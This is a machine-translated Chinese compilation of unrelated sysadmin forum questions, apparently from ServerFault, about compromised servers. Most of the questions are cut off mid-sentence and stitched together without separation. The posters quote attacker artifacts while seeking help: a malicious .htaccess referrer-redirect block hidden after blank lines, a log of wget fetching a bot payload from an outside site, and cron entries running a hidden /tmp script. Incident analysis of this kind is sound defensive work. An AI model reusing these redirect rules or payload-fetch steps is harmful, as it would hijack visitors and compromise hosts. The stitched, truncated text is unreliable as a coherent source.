大约 4 或 5 天前,一个客户回复我说他们的网站被从谷歌、雅虎等重定向到其他一些可疑的网站,但是当用户在浏览器地址中输入网站 URL 时它工作正常直接酒吧。
我尝试联系我的托管服务提供商,但他们一开始几乎没有帮助,然后似乎需要很长时间才能找出问题所在。
等待让我感到沮丧,我开始寻找发生了什么。在谷歌上搜索了一些解决方案后,我发现我的 .htaccess 文件被黑了。
什么是:
<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
已经变成
<Files *>
Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0"
Header set Expires: 0
Header set Pragma: no-cache
</Files>
//several hundred empty lines later
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] …我在服务器上没有看到任何可疑的东西(没有到远程 80 端口的 netstat 连接),但我不是专业的服务器管理员(我是一名铁杆软件开发人员)。请不要写明显的评论(聘请专业人士/公司) - 我们会在此问题解决后考虑。服务器在 Windows Server 2008 R2 下运行。我应该使用什么工具来分析这种情况?
这不是多个“如果我的服务器被黑了我该怎么办”的完全重复,因为我基本上需要提供证据证明我的服务器是干净的。
从一开始就采取了基本的安全措施(打开 Windows 防火墙,应用 Windows 更新补丁,启动并运行 Clamwin)。
我的提供商通知我的 Web 服务器上存在出站攻击。经过进一步检查,我在我的 Apache error.log 文件中看到了这一点:
--2012-02-04 04:40:59-- http://www.luxelivingforum.com/wp-content/themes/lifestyle/run
Resolving www.luxelivingforum.com... 184.168.113.199
Connecting to www.luxelivingforum.com|184.168.113.199|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68338 (67K) [text/plain]
Saving to: `./run'
0K .......... .......... .......... .......... .......... 74% 61.8K 0s
50K .......... ...... 100% 11.1M=0.8s
2012-02-04 04:41:01 (82.4 KB/s) - `./run' saved [68338/68338]
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 174.
Unquoted string "crazy" may clash with future reserved word at ./bot.pl line 211.
Unquoted string …我无法从任何地方登录到我的 Windows server 2008 机器。所有服务,如 FTP 服务器或网络服务器(我实际上没有使用,只是远程桌面和 FTP)都在运行。
无论我尝试什么凭据(甚至/特别是管理员),它总是显示未知用户名或密码错误。我已经尝试过关闭/打开和安全模式而没有运气。此外,我已经尝试将登录名输入为 SERVER NAME\user 或 Workgroup\user(每个区分大小写的情况),仍然说我有错误的登录。通常我们使用远程桌面来访问机器,但通过 KVM 进行本地访问也不起作用。
现在我无法控制或无法做某事。只有在 ctrl+alt+del 之前的登录屏幕才能登录警报。如果我无法登录,我实际上无法尝试修复任何问题。除了 SERVER NAME\user 之外,在 Internet 上找不到更多内容。重新安装将是最后的手段,但无论如何我不能让这种情况持续太久。这个服务器很重要。
如果有任何帮助,我认为自动 Windows 更新已关闭,过去几年没有更新或新安装的软件,只有几次软重启,最近没有。
它发生在它的运行时,而所有其他服务仍在运行,所以这不仅仅是在启动过程中出现的一些 Windows 令人讨厌的问题。什么可能改变?我现在有哪些选择?
我最近注意到我的 SSH 日志中有来自未知 IP 地址的条目。我执行了grep提取所有不包含我自己的 IP 地址的全部内容。我收到了这个:
Jul 24 22:06:54 server1 sshd[8261]: Accepted publickey for root from xxx.xxx.xx.xxx port 39721 ssh2
Jul 25 04:06:50 server1 sshd[8233]: Accepted publickey for root from xxx.xxx.xx.xxx port 40800 ssh2
Jul 25 04:08:30 server1 sshd[8233]: Received disconnect from xxx.xxx.xx.xxx: 11: disconnected by user
我有几个问题:
sshdPID后方括号中的四位数是 PID 吗?我在专用服务器上运行 CentOS 5。我正在使用 OpenSSH。
我的 MySQL 数据库被黑了,我找不到漏洞。我在 PHP 中有可靠的保护以防止注入,黑客本人已经与我沟通并说他不是通过注入进行黑客攻击。
如果没有注入,我还有哪些其他方式会被黑客入侵?我知道他不知道我的数据库密码,我没有受到 DDOS 攻击,第三,我的网站上没有黑客想要的个人信息,所以我认为黑客说的是实话。
那么如何在不注入的情况下篡改 MySQL 数据库呢?
我正在与一个由相当聪明的人组成的团队一起工作,他们对所分配的任务具有合理的技能(支持运营主管)。毫无疑问,由于当时的环境和对他们的训练,他们几乎没有主动性,害怕做错任何事。
现在该公司已决定该团队将加入随叫随到轮换。在第一次讨论这个问题的会议上,从他们的眼神和他们的问题来看,很明显,紧急情况下的决策责任对他们来说非常令人不安。我担心他们可能会在这种情况下冻结。
当紧急情况发生时,我如何让他们敞开心扉并控制局势?任何人都有这方面的直接经验?
编辑:这是关于系统管理(jboss、websphere、mysql 等),但我意识到这可能更适用于管理论坛。但是,由于我正在寻找战壕中的实践经验,我猜服务器故障仍然适用。我主要担心的是没有尽快备份系统。
此外,由于该部门还很年轻,我们并没有真正了解最有可能出错的地方。当然,这让事情变得更糟。
Edit2:所有非常好的答案,我会选择最适合我的答案
我有一个用于测试的 CentOS 云服务器,并注意到在过去的 30 天内,带宽已经达到顶峰(准确地说是16,000 GB)
当我最初尝试检查服务器时,它完全无法访问(SSH、Web甚至控制台都没有响应(控制台只显示一堆错误,没有登录提示)
我退回了服务器并开始查看日志和登录信息。多年来没有SSH登录,日志中没有什么奇怪的,除了每分钟:
Jan 17 02:20:01 wwwdev crond[21971]: (apache) CMD (/tmp/.../.shy/update >/dev/null 2>&1)
Jan 17 02:21:01 wwwdev crond[21976]: (apache) CMD (/tmp/.../.shy/update >/dev/null 2>&1)
Jan 17 02:22:01 wwwdev crond[21985]: (apache) CMD (/tmp/.../.shy/update >/dev/null 2>&1)
Jan 17 02:23:01 wwwdev crond[21990]: (apache) CMD (/tmp/.../.shy/update >/dev/null 2>&1)
Jan 17 02:24:01 wwwdev crond[22000]: (apache) CMD (/tmp/.../.shy/update >/dev/null 2>&1)
Jan 17 02:25:01 wwwdev crond[22006]: (apache) CMD (/tmp/.../.shy/update >/dev/null 2>&1)
Jan 17 02:26:01 wwwdev crond[22015]: (apache) CMD (/tmp/.../.shy/update >/dev/null …我继承了一个被入侵的网络服务器。试图找出 apache 挂起的原因以及服务器负载高的原因,我在 /tmp 中找到了 perlbot 4.5 的几个副本。我现在想弄清楚它们是如何进入机器的,以便我可以关闭孔。我一直在查看各种扫描仪,nessus 看起来不错,我在机器和托管的网站之一上进行了扫描。但是有几百个站点,太多了,任何人都无法了解所有这些站点的来龙去脉,而且我是新来的,所以我真的不知道他们可能在做什么。扫描每个站点是最好的选择吗?
您如何在同一台机器上检查这么多站点的问题?
编辑添加:我们正在擦除所有内容并从备份中恢复。这很好,但仍然让我们对原始漏洞持开放态度。使用 Nessus 或 Metasploit 一次扫描一个站点以试图找出该漏洞是什么?
编辑 2:它是 phpmyadmin。尽管这本来是我一注意到我们正在运行它就会升级的东西,但我通过倾倒 apache 日志专门发现了这个问题。nessus 和 metaspolit 很整洁但没有帮助。(我可能不明白如何充分利用它们,我只是运行了基本的自动扫描)。
我的 postmaster@mydomain.com 刚刚收到以下“未送达邮件”
这是否意味着有人可能试图(或成功)入侵我?
(出于隐私目的,我替换了下面的某些部分,这不是我在这里收到的 100% 原件。)
This is the mail system at host mydomain.com.
I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.
For further assistance, please send mail to <postmaster>
If you do so, please include this problem report. You can
delete your own text from the attached returned message.
The mail system
<ubahreasons@yahoo.com>: host mta7.am0.yahoodns.net[98.138.112.35] said: 554
delivery error: dd Sorry your message to …